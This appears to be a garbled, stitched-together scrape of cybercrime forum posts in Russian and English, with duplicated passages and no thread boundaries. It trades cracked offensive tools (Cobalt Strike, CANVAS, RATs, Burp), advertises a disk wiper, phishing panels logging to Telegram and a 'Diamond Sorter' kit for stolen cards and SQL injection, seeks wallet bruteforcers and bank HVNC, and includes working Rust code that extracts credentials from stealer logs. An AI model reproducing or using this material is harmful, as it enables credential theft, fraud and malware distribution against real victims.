Всем добра .
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/jQsQlSRI#82PAB7YHz0bPvCUMsi0M7H2CNP121YI2OjFJKBm2smI)
mega.nz
Собственно все написано в заголовке
Пробовал TM чекер и барахло с GitHub - либо не работает, либо не подходит
Ищу bruteforce на Exodus
Язык Python, либа Aiogram, знаменитых ботов в 1 файл 5500 строк просьба не
кидать)
Того кто скинет/поможет найти наилучший вариант - отблагодарю 11$ криптой
связь: пм
Splunk Enterprise - мощная платформа для операционной аналитики, собирает и индексирует любые машинные данные практически из любого источника в реальном времени. Система позволяет отслеживать, анализировать и визуализировать данные для получения полезных сведений об ИТ-системах организации.
Делюсь версией немного старее чем ~~farfar~~(не реклама) только без malvare в коробке
splunk-enterprise.lic -
virustotal
splunk-8.0.5-a1a6394cc5ae-x64-release.msi -
virustotal
splunkd.exe -
virustotal
инструкция прилагаеться
Hidden content for authorized users.
](https://anonfiles.com/t8ia8agfz6/Splunk_8_0_5_rar)
anonfiles.com
**пароль -**местный
CANVAS_7.27+D2ExploitationPack_v2.55+WhitePhosphorus_1.28_(Umbreon_leak_at_breached.to).7z
vshare.is
Tnx H0nus .
Нигде не могу найти может у кого есть
Where can I buy Mailjet service accounts? I mean, besides the official Mailjet website. Is it possible to buy these accounts cheaper. If yes, where can it be done?
Here's a new article about newer CS releases detailing measures taken to stop cracked versions, among other updates.
Cobalt Strike 4.6 is live and focuses on further security enhancements, as well as small updates including an execute-assembly limit Increase and the arsenal kit.
![www.cobaltstrike.com](/proxy.php?image=https%3A%2F%2Fwww.cobaltstrike.com%2Fapp%2Fuploads%2F2023%2F06%2Fcropped- android- chrome-512x512-2-32x32.png&hash=9028a511d8891ad9d1882a20b254e9fa&return_error=1) www.cobaltstrike.com
pharma47
Нужна помощь с определенными операциями ,так сказать , с этим софтом !
Если кому не трудно , выйдете в лично .
Есть несколько вопросов
Most clean version not malicous and run it in virtual machine
](https://anonfiles.com/U6dcubz9za/Anarchy_Panel_4_7_7z)
anonfiles.com
Rar pass :@ReverseEngineeringLab
USER ID/PASSWORD
Доставка в телеграм. Изменить данные бота в файле send.php
You must have at least 2 message(s) to view the content.
Очень хайповая тема, интересует продажник с данным лоадером (сайт где приобрести или контакты) . Может кто то замечал где либо
dm me pls
Only escrow
IDA Pro 7.7 SP1 (x86, x64, ARM64) + Tools
More Info - https://hex-rays.com/products/ida/news/7_7/
DL Link -
[ https://google- storage.com/cloudshare/758614986501-rcd/IDA%20Pro%207.7%20SP1.7z ](https://google- storage.com/cloudshare/758614986501-rcd/IDA%20Pro%207.7%20SP1.7z)
VT Scan -
__
](https://www.virustotal.com/gui/file/f1c35c15859e510a786a6a736a9a577b403cb54df18a6133bb836fdfc659f720)
VirusTotal
www.virustotal.com
This is Not My Release, Copied Only
scr: /threads/102695/
Логи идут в телегу.
Вид:
Nemesis Market LOGS
----------------------------------Username: retterert
Password: werwer
IP: 127.0.0.1
----------------------------------Click to expand...
Разметка без мусора.
С работающего -> главная страница и страница авторизации.
Токен и чат-айди бота указать в файле login/POST.php
You must have at least 10 message(s) to view the content.
Решение невидимой капчи v3 гугл на запросах (без использования антикапчи,
браузера)
_Google 's invisible captcha v3 solution on requests (without using anti-
captcha, browser)_
Python:Copy to clipboard
import asyncio
from invisible_captcha_bypasser import solve_captcha
captcha_response: str = asyncio.run(solve_captcha(anchor_url='',
proxy='http://user:pass@127.0.0.1:25565'))
**PyPi -https://pypi.org/project/invisible-captcha-bypasser/
GitHub -
https://github.com/nazavod777/invisible_captcha_bypasser/**
Hello,
I am looking for an imap/email scraper/extractor that can search in a list of access for specific keywords.
email + pass added in a list and the software has to search and save the email with the specific keyword found.
If you got any PM me.
Thanks
Spoiler: Download link:
Code:Copy to clipboard
https://gofile.io/d/aOoc77
https://send.exploit.in/download/629293106328633b/#oyyvqyapqymuUhxU1m2KNg
https://oshi.at/TcAM
This crack was shared via thePwn3rzs telegram chat. Be sure to use in a virtual machine.
Multithreaded wiper that walks all target disks for files with specific extensions, overwrting a given number of byte in each file (for speed) and deleting it to prevent files carving..
FEATURES
-Anti-sandbox techniques implemented.
-Notifications are sent via telegram.
-Disables Windows recovery.
NOTIFICATIONS
DETECTION RATE
PASSOWRD : 8bb48241dced75a8b0b3b786c000931ed582d
![](/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FS0jMf9n%2Fx-Ray-Web- Vulnerability-Scanner-Advanced.jpg&hash=67fbb9150c7aec054e8a9e325c429497)
Расширенный сканер уязвимостей xRay Web Полная активация
Отсутствие ложных срабатываний без ущерба для бизнеса
Каждая лазейка подверглась реальным экспериментальным исследованиям с использованием усовершенствованного семантического анализа + инновационной технологии обнаружения, чтобы гарантировать, что лазейка является реальной и эффективной, во избежание массовых искажений, влияющих на бизнес-суждение, и для экономии ресурсов безопасности。
Сообщество Xray - это бесплатная платформа инструментов для белых шляп,
запущенная Nagaki Technology. В настоящее время в сообществе есть
рентгеновский сканер лазейки Radium reptile
Инструменты были созданы многими опытными разработчиками безопасности и
десятками тысяч участников сообщества.
Множество удивительных функций в одном
Обнаружение распространенных веб-уязвимостей
Встроенные 10+ общих модулей обнаружения веб-уязвимостей, поддерживающие точное обнаружение распространенных уязвимостей, таких как SQL-инъекция, XSS, выполнение команд, включение файлов и т. Д.
200+ POC
Более 200 встроенных высококачественных POC, представленных сообществом,
охватывающих веб-уязвимости с высоким риском за последние три года реальных
боевых действий, и все они бесплатны для использования.
Специальные возможности тестирования
Расширенная версия поддерживает обнаружение исторических уязвимостей с высоким
риском в таких фреймворках, как struts, fastjson, thinkphp, Shiro и т. Д.,
Одним щелчком мыши.
Алгоритм обнаружения NG
Интеллектуальное обнаружение - это не пустая болтовня, основанная на
многолетнем опыте экспертов по безопасности в нападении и защите и выражении
его с помощью уникального и эффективного метода обнаружения.
Поддержка глубокой настройки
Многие элементы конфигурации открываются в файле конфигурации, и возможности
движка можно значительно настроить, настроив соответствующие параметры.
Метод сканирования из нескольких источников
Поддержка пассивного прокси, базового сканера, поискового робота, одного URL и
других источников ввода не обязательна, и вы можете использовать прокси для
расширения самостоятельно.
Поисковый робот
Сканер rad может динамически отображать веб-сайты с различными фреймворками и
запрашивать обходы, не упуская «скрытые углы», в которых существуют лазейки.
Высокоинтерактивный доступ к странице
При моделировании поведения человека при щелчке, вводе и других операциях,
интеллектуальная остановка, возврат, продолжение щелчка и другие операции.
Постоянные итеративные обновления
Важные проблемы быстро исправляются, а серьезные уязвимости продолжают
добавляться для поддержания жизнеспособности
Вы можете использовать расширенный сканер уязвимостей xRay Web с Acunetix Premium
Activated -WwW.Dr-FarFar.CoM.zip**
Существует программа, допустим надо дипломную работу сделать и есть программа
в которую ты можешь вставить из интернета дипломную работу и она повысит
оригинальность на 75%, заменяя слова на синонимы и.т.д
Кто знает что за прога, дайте знать
**WhatsApp Business Sender v.xx 2024
**
](https://drive.google.com/file/d/1bBXyS31FQH3WTN65qNZEmKVLsFZomr0M/view?usp=drivesdk)
drive.google.com
Download From : https://tigervikram.com/content/download-softwares/**
Serial : Dr.FarFar [ WwW.Dr-FarFar.CoM ]**
**Days Validity :**1000000000
Max No Users : 1000000000
https://thehackernews.com/2024/04/millions-of-malicious-imageless.html
users include short text descriptions and metadata in HTML format, along with any container images they publish.
but this is commonly exploited by threat actors to upload imageless containers and include description pages that embedded links to spam, phishing, and malware sites
**This tool is made to scrape the Valid phone number leads from web sources
supports multiple counties (US, UK, CN, JP, IND )and validates the phone
numbers with telecom carrier info
DOWNLOAD**
Ищу приложение, при помощи которого можно раздавать WiFi с vpn и ручной сменой мак адреса. Рут доступ есть
as title says , i am in seek of a working bank hvnc latest one, can someone
lead me to one.
i have a unique way of spreading
got network with many app owners who are willing to install.
После двух лет простоя разработки вышла новая версия GoodbyeDPI, программы под ОС Windows для обхода блокировок интернет-ресурсов, осуществляемых с помощью систем глубокого анализа трафика (Deep Packet Inspection) на стороне интернет- провайдеров. Программа позволяет получить доступ к веб-сайтам и сервисам, заблокированным на государственном уровне, без использования VPN, прокси и других способов туннелирования трафика, только лишь за счёт нестандартных манипуляций с пакетами на сетевом, транспортном и сессионном уровнях модели OSI. Код написан на языке Си и распространяется под лицензией Apache 2.0.
Значительным нововведением новой версии является функция Auto TTL, автоматически рассчитывающая значение поля Time to live для поддельного запроса HTTP или TLS ClientHello таким образом, чтобы он был распознан системой DPI, но не был получен хостом назначения. Также в программу добавлен метод фрагментации (сегментации) запросов без уменьшения значения TCP Window Size входящего пакета, из-за чего ранее возникали проблемы с доступом на часть ресурсов, программный стек которых ожидал полного запроса TLS ClientHello от клиента в одном пакете. Методы обхода показали свою эффективность в России, Индонезии, Южной Корее, Турции, Иране и других странах с интернет- блокировками.
+: На днях также опубликован выпуск PowerTunnel 2.0, кроссплатформенной реализации GoodbyeDPI, написанной на языке Java и поддерживающей работу в Linux и Android. В новой версии PowerTunnel полностью переписан и трансформирован в полноценный прокси сервер, расширяемый через плагины. Связанная с обходом блокировок функциональность вынесена в плагин LibertyTunnel. Код переведён с лицензии MIT на GPLv3.
Также регулярно обновляется утилита [zapret](https://github.com/bol- van/zapret), предлагающая средства для обхода DPI для Linux и BSD-систем. В выпущенном в начале декабря 42 обновлении [добавлен](https://github.com/bol- van/zapret/commit/a49c5e79462d180302843dd303a1fe39a330ed42) скрипт blockcheck.sh (аналог утилиты blockcheck) для диагностики причин проблем с доступом и автоматического выбора стратегии для обхода блокировки.
Расширенный сканер уязвимостей xRay Web Полная активация
Отсутствие ложных срабатываний без ущерба для бизнеса
Каждая лазейка подверглась реальным экспериментальным исследованиям с использованием усовершенствованного семантического анализа + инновационной технологии обнаружения, чтобы гарантировать, что лазейка является реальной и эффективной, во избежание массовых искажений, влияющих на бизнес-суждение, и для экономии ресурсов безопасности。
Сообщество Xray - это бесплатная платформа инструментов для белых шляп,
запущенная Nagaki Technology. В настоящее время в сообществе есть
рентгеновский сканер лазейки Radium reptile
Инструменты были созданы многими опытными разработчиками безопасности и
десятками тысяч участников сообщества.
Множество удивительных функций в одном
Обнаружение распространенных веб-уязвимостей
Встроенные 10+ общих модулей обнаружения веб-уязвимостей, поддерживающие точное обнаружение распространенных уязвимостей, таких как SQL-инъекция, XSS, выполнение команд, включение файлов и т. Д.
200+ POC
Более 200 встроенных высококачественных POC, представленных сообществом,
охватывающих веб-уязвимости с высоким риском за последние три года реальных
боевых действий, и все они бесплатны для использования.
Специальные возможности тестирования
Расширенная версия поддерживает обнаружение исторических уязвимостей с высоким
риском в таких фреймворках, как struts, fastjson, thinkphp, Shiro и т. Д.,
Одним щелчком мыши.
Алгоритм обнаружения NG
Интеллектуальное обнаружение - это не пустая болтовня, основанная на
многолетнем опыте экспертов по безопасности в нападении и защите и выражении
его с помощью уникального и эффективного метода обнаружения.
Поддержка глубокой настройки
Многие элементы конфигурации открываются в файле конфигурации, и возможности
движка можно значительно настроить, настроив соответствующие параметры.
Метод сканирования из нескольких источников
Поддержка пассивного прокси, базового сканера, поискового робота, одного URL и
других источников ввода не обязательна, и вы можете использовать прокси для
расширения самостоятельно.
Поисковый робот
Сканер rad может динамически отображать веб-сайты с различными фреймворками и
запрашивать обходы, не упуская «скрытые углы», в которых существуют лазейки.
Высокоинтерактивный доступ к странице
При моделировании поведения человека при щелчке, вводе и других операциях,
интеллектуальная остановка, возврат, продолжение щелчка и другие операции.
Постоянные итеративные обновления
Важные проблемы быстро исправляются, а серьезные уязвимости продолжают
добавляться для поддержания жизнеспособности
Вы можете использовать расширенный сканер уязвимостей xRay Web с Acunetix Premium
Activated -WwW.Dr-FarFar.CoM.zip**
Всем привет! Есть ли последняя взломанная версия Metasploit Pro?
Приветствую, пытаюсь найти скрипт для продажи СС. По поиску на форуме не нашел, может есть какие слитые? Подскажите пожалуйста
Есть ли какие то скрипты, утилиты для полного сброса настроек на андройде?
Имеется Андройд рат. Есть возможность удаленного доступа(vnc) + загрузка новых *.apk файлов
Можно ли как то замести свои следы на телефоне жертвы после работы с телефоном?
Пентестеры обычно пользуются похожими скриптами, чтобы удалить, скрыть все свои действия
Понимаю, что если есть vnc, то можно самому через настройки сделать сбор телефона, но меня интересует именно какой то apk файл
Ищу фиш панель телеграм под сбор session файлов для авторизации. Необходимо хорошее решение, а не говно от которого помирают 50% логов. Готов рассмотреть покупку/аренду/отдавать часть логов
Eng;
I'm looking for a builder hook that will work on Accessibility itself and html
itself
I can pay for the builder
contacts; PM xss
Rus;
Ищу хук билдер который будет работать сам Accessibility и сам html
Могу заплатить за билдер
Контакты; PM xss
Дамы и Господа, возможно кто-то может посоветовать бесплатное, или возможно разово оплачиваемое решение, для проверки почт на валидность перед рассылкой?
Темки искал подобные, из того что было все линки битые... Платные решения только на количество проверяемых строк, разовой покупки такого софта ни где не предусмотрено.
Code:Copy to clipboard
use regex::Regex;
use walkdir::WalkDir;
use zip;
fn main() {
let mut clear = false;
let mut em_only = false;
let mut dirs: Vec<String> = Vec::new();
let pargs = std::env::args().skip(1);
for arg in pargs {
if arg.contains("-clear") || arg.contains("--clear") {
clear = true;
} else if arg.contains("-email") || arg.contains("--email") {
em_only = true;
} else {
let meta = std::fs::metadata(&arg).unwrap();
if meta.is_dir() {
dirs.push(arg);
}
}
}
for dir in &dirs {
for entry in WalkDir::new(dir).into_iter().filter_map(|e| e.ok()) {
if entry.path().is_file() {
let filename = entry.path().file_name().unwrap().to_str().unwrap();
if filename.contains("assword") && filename.ends_with("txt") {
let data = std::fs::read_to_string(&entry.path()).unwrap();
collect_passwords(data, em_only);
} else if filename.ends_with("zip") {
let reader = std::fs::OpenOptions::new()
.read(true)
.open(&entry.path())
.unwrap();
let mut z_file = zip::ZipArchive::new(reader).unwrap();
for i in 0..z_file.len() {
let mut file = z_file.by_index(i).unwrap();
if file.is_file()
&& file.name().contains("assword")
&& file.name().ends_with("txt")
{
let mut data: Vec<u8> = Vec::new();
std::io::copy(&mut file, &mut data).unwrap();
collect_passwords(
std::str::from_utf8_mut(&mut data).unwrap().to_string(),
em_only,
);
}
}
}
}
}
}
if clear {
for dir in dirs {
std::fs::remove_dir_all(dir).unwrap();
}
}
}
fn collect_passwords(data: String, em: bool) {
let re = Regex::new(
r"^([a-z0-9_+]([a-z0-9_+.]*[a-z0-9_+])?)@([a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6})",
)
.unwrap();
let mut buf = String::new();
let lines: Vec<&str> = data.split("\r\n").collect();
for line in lines {
if line.starts_with("Username") {
let u: Vec<&str> = line.split(": ").collect();
if u.len() != 2 {
continue;
}
buf.push_str(u[1].to_lowercase().as_str());
} else if line.starts_with("Password") {
let p: Vec<&str> = line.split(": ").collect();
if p.len() != 2 {
continue;
}
buf.push_str(":");
buf.push_str(p[1]);
buf.push_str("\n");
}
}
let mut creds: Vec<&str> = buf.split("\n").collect();
creds.dedup();
creds.pop();
for i in creds {
if em {
if re.is_match(i) {
println!("{}", i)
}
} else {
println!("{}", i)
}
}
}
Доброго времени, господа, подскажите пожалуйста, есть ли у кого нибудь парсер
по каналам, чтобы обязательным условием было парсинг каналов только с
открытыми комментариями/комментарии на одобрение админа.
Если есть доп фишки, типо статы ER и углубленка по тематикам, или по другим
параметрам, то было бы круто бы благодарен за помощь
Если есть варианты еще дополнительного решения, то могли бы обсудить
Или есть у кого чекер для проверки наличия комментариев в канале
Жду ваших предложений)
На сайте разработчиков ZennoPoster`a стартовал 12-й конкурс шаблонов.
Рекомендую почитать мои статьи:
"Парсинг остатков товаров в WILDBERRIES.RU с отправкой в Telegram"
"Парсинг Coinmarketcap.com с архивацией и отправкой результата в телеграм и на email"
Создание видео из фото с равномерной озвучкой на C#.
Там же вы можете забрать бесплатные шаблоны к статьям.
Themida обфускатор - это продвинутая защита программного обеспечения Windows.
Позволяет примерно сбить c 20 детектов до 6, с 30 до 13, зависит от софта.
Запускаете, перетаскиваете в программу exe файл и жмёте Proterct.
](https://www.upload.ee/files/15162701/Themida_x32_x64_v3.1.4.18_Retail_Licensed.zip.html)
Themida_x32_x64_v3.1.4.18_Retail_Licensed.zip - Download. Upload.ee
www.upload.ee
Видал где то был на просторах этого форума, но вот найти не могу, есть такой же софт, но только для беп-20 токенов, может кто линком поделиться?
Most clean version not malicous and run it in virtual machine
](https://anonfiles.com/k7hfu6zczb/888_Rat_v1_2_6_7z)
anonfiles.com
Rar pass :@ReverseEngineeringLab
Diamond Sorter: The Diamonds Are Found Underground!
**Here are some of the generated features from evaluating the source code:
**
Cyber Enthusiasts & Data Wizards! Step into the future with DiamondSorter, the all-encompassing suite that's revolutionizing data management and cybersecurity. With a single click, embark on a journey of seamless data sorting, impenetrable security, and unparalleled efficiency.
Seamless Data Sorting & Security Analysis
DiamondSorter's advanced algorithms empower you to sort, analyze, and secure
your data effortlessly. From credit card details to sensitive security data,
manage it all with unmatched precision.
Effortless File Organization
Bid farewell to cluttered directories! Our intuitive interface is your gateway
to organizing files, removing duplicates, and extracting valuable information
with unparalleled ease.
Robust Encryption & Authentication
Fortify your digital assets with DiamondSorter's PGP, encryption keys, and
auth file management tools. Rest assured, your data is shielded against any
threat.
Cookie Management Mastery
Assert dominance over your online presence with our sophisticated cookie
sorting and scraping capabilities. Stay compliant and manage consent with
DiamondSorter's cutting-edge technology.
Targeted Email & Domain Extraction
Unlock new opportunities with our specialized crawlers for business emails and
government domains. Expand your network and reach with pinpoint accuracy.
Real-Time Monitoring & Crawling
Maintain a pulse on your data with real-time monitoring features and powerful
crawling capabilities. Uncover WordPress instances and more, all within
DiamondSorter's dynamic environment.
Statistical Insights & Analysis
Gain a competitive edge with detailed domain stats and analytics. Make
informed decisions and strategize with confidence using DiamondSorter.
Customizable Tools for Every Need
From Chrome extension management to creating password lists, DiamondSorter is
equipped with a diverse set of tools tailored to your unique requirements.
User-Friendly Experience
Enjoy a seamless experience with features like word wrap toggling, trash
removal, and an easy-to-navigate interface. DiamondSorter is designed for both
beginners and experts.
SQL Injection Arsenal
Harness the power of SQL injection and penetrate the defenses of fortified
databases. Diamond Sorter's automated payload delivery and multi-platform
compatibility make it the ultimate tool for exploiting vulnerabilities.
Unlock the Digital Vault
Extract complete credit card information with regex precision. Diamond
Sorter's CC Data Mastery is your gateway to the treasure trove of financial
secrets.
Key to the Kingdom
Generate scripts for Openbullet and more with Diamond Sorter's Config
Developer Assistant. Forge the keys to any cyber fortress and watch as doors
swing open at your command.
Want to try for your self? Just ask for a free trail license.
Spoiler: licenses
DIAMOND-B7yupI-Z9FsQ2-q4Cf2D-rwjPTM-yTvR7V
DIAMOND-AtBZ4t-hfCXxA-bHxaxH-M3pPVQ-lzGg8I
DIAMOND-Vccfwg-l8BKwb-I6rdFv-DDOptV-NngK8h
DIAMOND-ecb9G2-3jLmpb-1BmlgA-GSvjFk-Tef5zf
DIAMOND-p0rztn-F0rVAs-r5BSz9-lahGRU-KO1vLW
DIAMOND-bHCnGb-ECivu0-2acMHW-Swv37G-4WyNkb
DIAMOND-IZyRuB-httdki-5Bb7cq-NbFrOW-B0rAzX
DIAMOND-tUwfGH-vRl6XP-azcQRr-pARiV3-9kVHOz
DIAMOND-qiOLLr-CBDZyx-qQAc2V-pRSBUY-bpRZGw
DIAMOND-mQXXYg-ludOth-OOudlo-u2c7ad-vZEQbS
DIAMOND-zPtJiQ-K7Nqvx-L5kjG3-4okmpa-Vpg8UO
DIAMOND-IgJwin-6dfRuT-zx1Uxi-GtmT2t-qq11qX
DIAMOND-xeMEQr-cY4R20-I69Fwm-yIfity-hO0923
DIAMOND-yvhXGo-CQmhVL-tQiHR7-5QnF93-4JlThI
DIAMOND-kmzR4X-lOrGij-8k4X0P-1yTJIS-xcamv9
DIAMOND-Yq4z4U-5sBQz9-2P2Aco-jtgBmI-gJLyhD
DIAMOND-PBs56i-zP2GOr-sbdnuO-IT2VJH-jvXfDs
DIAMOND-bPWQGe-aB29V1-XtW4m1-dqeKAz-D5h5oG
DIAMOND-HePv04-ApXPvB-z6qaZu-HZvzkV-0T2MFU
DIAMOND-zrxgOG-yWNZ3U-i0c2x1-t2wh4M-zK0VXQ
🎛 Control Center
Mastermind your hacking operations from Diamond Sorter's control center. Track
tasks, filter targets, and manage processes with the confidence of a cyber
overlord.
Secure,
Sort, and Master Your Data Universe
Diamond Sorter is your comprehensive solution for data extraction, analysis,
and security. With a vast array of functions, this toolkit is designed to
empower users to handle complex data with ease and precision.
Paste
Input
Effortlessly paste clipboard content directly into the input_text widget,
streamlining your data input process.
Replace
With ListButton
Customize your data sets by replacing repeating strings or values across
multiple lines, enhancing consistency and clarity.
Wordpress
Finder
Deploy advanced crawling logic to uncover WordPress instances, revealing a
world of hidden digital landscapes.
Handle
Scrape Keys
Extract valuable keys from your directories, unlocking the potential of secure
data management.
🖥 Server Information & CPanel Accounts
Retrieve critical server information and cPanel account details, ensuring you
have the insights needed for effective web management.
Emails
& Business Emails
Harvest email addresses and business contacts, expanding your network and
outreach capabilities.
Gov
Domains & Member ID PIN
Discover government domains and manage member ID/PIN data with targeted
scraping functions.
Handle
Scrape Security Data
Secure your operations by scraping and analyzing security data, staying one
step ahead of threats.
Handle
Command Link & Telegram Folder Sorting
Organize your digital space with command link handling and Telegram folder
sorting, bringing order to chaos.
Handle
Browser 2FA Extension & Desktop Wallet
Enhance your security posture with browser 2FA extension handling and desktop
wallet management.
Handle
Text Named Sorting & PGP
Sort text by name and manage PGP operations, ensuring your data is both
organized and secure.
Handle
Encryption Keys & Auth Files
Take control of encryption keys and auth files, fortifying your digital
assets.
Handle
Sort by Cookies & Chrome Extensions
Master cookie management and Chrome extensions, tailoring your browsing
experience to your needs.
Handle
New Text Documents & Discord Files
Process new text documents and manage Discord files with ease, keeping your
data streamlined and accessible.
Launch
Domain Manager & Sort Email Domains
Launch the domain manager and sort through email domains, gaining a strategic
overview of your digital presence.
Show
Stats & Cleanup Button
View comprehensive statistics and perform cleanups with customizable actions,
maintaining the integrity of your data.
Remove
Inbetween Two Variables & Remove Captures
Refine your text by removing inbetweens and captures, ensuring your content is
precise and to the point.
Split
By Lines & Start Sorting
Divide content into manageable segments and initiate sorting operations,
bringing structure to your datasets.
Password
Sorting & Organize Lines
Sort passwords and organize lines alphabetically, enhancing both security and
readability.
Combine
Files & OBSOLETE__cleanup
Merge files and perform legacy cleanups, consolidating your data for optimal
use.
Update
Line Count & Create Password List
Keep track of your data metrics in real-time and create comprehensive password
lists for security analysis.
Email
Password
Extract and display email pairs, providing you with actionable data for
outreach or security assessments.
With Diamond Sorter, you're not just managing data; you're commanding it. Experience the power, precision, and versatility that our suite of functions offers.
Look Into The Cookie Features:
Detailed
Cookie Declaration at Your Fingertips
Generate comprehensive cookie declaration tables with ease. Know your cookies'
purpose, type, and lifespan - all neatly organized for your convenience.
Scan
Cookies Like a Pro
With our Cookie Scanner Widget, dive deep into any website's cookie jar. Get
detailed reports and stay informed about the cookies you encounter online.
Sort
Cookies with Precision
Categorize cookies by function and manage them effectively. Our sorting
feature brings order to the chaos, making cookie management a breeze.
👁 Real-Time Cookie Monitoring
Stay ahead with our real-time cookie monitoring. Watch cookies as they are set
and accessed, maintaining full control over your digital footprint.
Detailed
Cookie Reports:
Comprehensive reports that list all cookies, their purpose, provider,
duration, and type.
Cookie
Declaration Table:
A table that declares all cookies in use on a website, often required for
privacy policy pages.
Educational
Resources for the Inquisitive Mind
Expand your knowledge with our educational resources. Understand cookies and
privacy laws to manage your online presence more effectively.
fedor007 requested if I could provide a working and cracked version of latest version of Datacol,
so here it is:
Latest version as of now, tested and working.
Please report any issue.
Download the trial from the official website.
Then overwrite the three files attached into the zip file down below.
Done.
May provide a universal patcher later, executables are highly obfuscated so I must deobfuscated them in full first.
/NR
BurpBountyPro_v2.4_Cracked
](https://anonfiles.com/p1w24fO6x6/BurpBountyPro_v2.4_Cracked_zip)
anonfiles.com
Приветствую!
Ищу кодера для брут+чекера нескольких контор. Возможно у кого-то есть готовые
Сделка через гарант
Activated.png](https://xss.is/attachments/29127/)
axiom-forensics-premium/)
intuitive Analytics tools to easily analyze data in one case file.**
Recover data from Smartphones, Computers, and the Cloud
Examine evidence across all your sources in one case file
Surface and share insights with powerful analytics and reporting tools
for Digital Forensics Examiners**
Digital investigations today are complex, with potential evidence increasingly
spread out over a wide variety of devices, applications, and services.
Examiners need solutions that can quickly and easily surface the evidence that
matters to their case.
Magnet AXIOM enables you to recover, analyze, and report on the digital
evidence from Smartphones, Computers, and the Cloud, all in one case file.
Examining more apps, more storage, and more hidden data than ever before can
be time consuming.
AXIOM’s powerful and intuitive Analytics features like Connections, Timeline,
and Magnet.
AI help forensics examiners and professionals quickly uncover the truth and
understand what truly happened.
Magnet AXIOM Forensics Full Activated
![Beam-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FBeam.png&hash=216c9aab92b0fd5a2a3b1e9023e053e6) Beam
Transactions NEW
![Coinbase-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FCoinbase.png&hash=6809c2269c9c6be42db23a4634814ee8)
Coinbase NEW
![Exodus-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FExodus.png&hash=5126e3bedd7bbefbdc616235ffd01464)
Exodus NEW
![Grindr-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FGrindr.png&hash=6ea2d2a8806ce0ebbca59abe5d3c1980)
Grindr
![ProtonMail-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FProtonMail.png&hash=01a3ccd3331142223253585be2a564cc)
ProtonMail Contacts NEW
![ProtonMail-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FProtonMail.png&hash=01a3ccd3331142223253585be2a564cc)
ProtonMail Emails NEW
![Signal-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSignal.png&hash=7a9f7eee3947bde2d1eb2fd57037559c)
Signal
![Wickr-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FWickr.png&hash=7f7e0ed6a3b49710e942dbd2d06f47c0) Wickr
![MacOS_Generic-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FMacOS_Generic.png&hash=81eac28e2e640fe3eefb3f2ff1518346)
PowerLog Battery Shutdown NEW
![MacOS_Generic-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FMacOS_Generic.png&hash=81eac28e2e640fe3eefb3f2ff1518346)
PowerLog Application State NEW
![MacOS_Generic-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FMacOS_Generic.png&hash=81eac28e2e640fe3eefb3f2ff1518346)
Trash Items
![Beam-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FBeam.png&hash=216c9aab92b0fd5a2a3b1e9023e053e6) Beam
Transactions NEW
![Coinbase-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FCoinbase.png&hash=6809c2269c9c6be42db23a4634814ee8)
Coinbase NEW
![Exodus-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FExodus.png&hash=5126e3bedd7bbefbdc616235ffd01464)
Exodus NEW
![Facebook Messenger-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FFacebook%2520Messenger.png&hash=0f0ffd7b41d1600c01b3ac3ad041fc9b)
Facebook Messenger
![MacOS_Generic-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FMacOS_Generic.png&hash=81eac28e2e640fe3eefb3f2ff1518346)
PowerLog Battery Shutdown NEW
![MacOS_Generic-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FMacOS_Generic.png&hash=81eac28e2e640fe3eefb3f2ff1518346)
PowerLog Application State NEW
![Signal-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSignal.png&hash=7a9f7eee3947bde2d1eb2fd57037559c)
Signal
![Snapchat-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FSnapchat.png&hash=2f32df7afe84347cab6a276f4a4e63c4)
Snapchat
![WhatsApp-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FWhatsApp.png&hash=c36b6b249cfec35ae58b7e2104f63331)
WhatsApp
![Wickr-
icon](/proxy.php?image=https%3A%2F%2Fmagnetforensics.com%2Fdocs%2Frelease-
notes%2Faxiom%2Ficons%2FWickr.png&hash=7f7e0ed6a3b49710e942dbd2d06f47c0) Wickr
